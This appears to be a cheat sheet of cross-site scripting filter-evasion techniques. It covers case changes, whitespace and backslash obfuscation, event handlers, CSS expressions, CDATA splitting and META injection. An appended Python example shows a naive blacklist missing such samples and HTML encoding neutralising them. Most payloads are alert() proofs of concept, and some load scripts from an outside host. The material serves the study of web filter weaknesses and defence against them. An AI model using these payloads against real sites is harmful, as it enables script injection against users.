1. Change the case of characters

<sCript>alert('d')</scRipT>

2. Add extra characters to evade regular-expression checks

<<script>alert('c')//<</script>
<SCRIPT a=">" SRC="t.js"></SCRIPT>
<SCRIPT =">" SRC="t.js"></SCRIPT>
<SCRIPT a=">" '' SRC="t.js"></SCRIPT>
<SCRIPT "a='>'" SRC="t.js"></SCRIPT>
<SCRIPT a=`>` SRC="t.js"></SCRIPT>
<SCRIPT a=">'>" SRC="t.js"></SCRIPT>

3. Replace the .js extension with another one

<script src="bad.jpg"></script>

4. Put the JavaScript inside a CSS file

<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">

example:

body {
    background-image: url('javascript:alert("XSS");')
}

5. Insert extra characters inside the script tag

<SCRIPT/SRC="t.js"></SCRIPT>
<SCRIPT/anyword SRC="t.js"></SCRIPT>

6. Use a tab or a newline to evade

<img src="jav ascr ipt:alert('XSS3')">
<img src="jav ascr ipt:alert('XSS3')">
<IMG SRC="jav ascript:alert('XSS');">

-> tab
-> newline

7. Use "\" to evade

<STYLE>@im\port'\ja\vasc\ript:alert("XSS32")';</STYLE>
<IMG STYLE='xss:expre\ssion(alert("XSS33"))'>
<IMG STYLE="xss:expr/*anyword*/ession(alert('sss'))">
<DIV STYLE="width: expre\ssi\on(alert('XSS31'));">
<A STYLE='no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))'>

8. Use hex encoding to evade (the ";" may also be dropped)

<DIV STYLE="width: expre\ssi\on(alert('XSS31'));">
Source: <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">
Source: <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">

9. Script in an HTML tag (event handlers)

<body onload="alert('onload')">

onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload

10. XSS code contained in a SWF

<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>

11. Use CDATA to split the XSS code apart and have it reassembled.

<XML ID=I><X><C>
<![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
</C></X>
</xml>

<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>
<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>

12. Use HTML+TIME.

<HTML><BODY>
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
<?import namespace="t" implementation="#default#time2">
<t:set attributeName="innerHTML" to="anyword<SCRIPT DEFER>alert("XSS")</SCRIPT>">
</BODY></HTML>

13. Write a cookie via META.

<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">

14. JavaScript in src, href, url

<IFRAME SRC=javascript:alert('13')></IFRAME>
<img src="javascript:alert('XSS3')">
<IMG DYNSRC="javascript:alert('XSS20')">
<IMG LOWSRC="javascript:alert('XSS21')">
<LINK REL="stylesheet" HREF="javascript:alert('XSS24');">
<IFRAME SRC=javascript:alert('XSS27')></IFRAME>
<TABLE BACKGROUND="javascript:alert('XSS29')">
<DIV STYLE="background-image: url(javascript:alert('XSS30'))">
<STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS35')");}</STYLE><A CLASS=XSS></A>
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
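Every technique above targets a filter that looks for one fixed string. As an added example that is not part of the original post, the Python below runs constructed samples modelled on techniques 1, 5, 6 and 9 through a naive case-sensitive blacklist (also constructed) and then through HTML text-context encoding, using Python's own HTML parser to count how many tags survive each path.

```python
import html
import re
from html.parser import HTMLParser

# Constructed samples modelled on techniques 1, 5, 6 and 9 above (not from the post).
SAMPLES = [
    "<sCript>alert('d')</scRipT>",               # 1: mixed-case tag name
    '<SCRIPT/SRC="t.js"></SCRIPT>',              # 5: "/" instead of a space
    '<img src="jav\tascript:alert(\'XSS3\')">',  # 6: tab inside the scheme
    '<body onunload="alert(\'x\')">',            # 9: a handler the blacklist lacks
]

# A naive, case-sensitive blacklist of the kind these techniques defeat (constructed).
NAIVE_BLACKLIST = re.compile(r"<script>|javascript:|onload=")

def naive_filter_blocks(fragment: str) -> bool:
    """True if the blacklist rejects the fragment; every sample above slips past."""
    return NAIVE_BLACKLIST.search(fragment) is not None

class _TagCounter(HTMLParser):
    """Counts start tags the way a real HTML parser tokenises them."""
    def __init__(self) -> None:
        super().__init__()
        self.tags = 0

    def handle_starttag(self, tag, attrs):
        self.tags += 1

def count_tags(fragment: str) -> int:
    parser = _TagCounter()
    parser.feed(fragment)
    parser.close()
    return parser.tags

def render_as_text(untrusted: str) -> str:
    """Mitigation: encode for the HTML text context instead of pattern-matching.
    Attribute, URL and CSS contexts each need their own encoder."""
    return html.escape(untrusted, quote=True)

def evaluate(samples):
    """Per sample: (blocked by blacklist, tags in raw input, tags after encoding)."""
    return [(naive_filter_blocks(s), count_tags(s), count_tags(render_as_text(s)))
            for s in samples]

if __name__ == "__main__":
    for sample, (blocked, raw, enc) in zip(SAMPLES, evaluate(SAMPLES)):
        print(f"{sample!r}: blocked={blocked} raw_tags={raw} encoded_tags={enc}")
```

The blacklist rejects none of the four samples while the parser sees a live tag in each; after encoding, the parser sees no tags at all, which is the property a defender should test for rather than the absence of a particular substring.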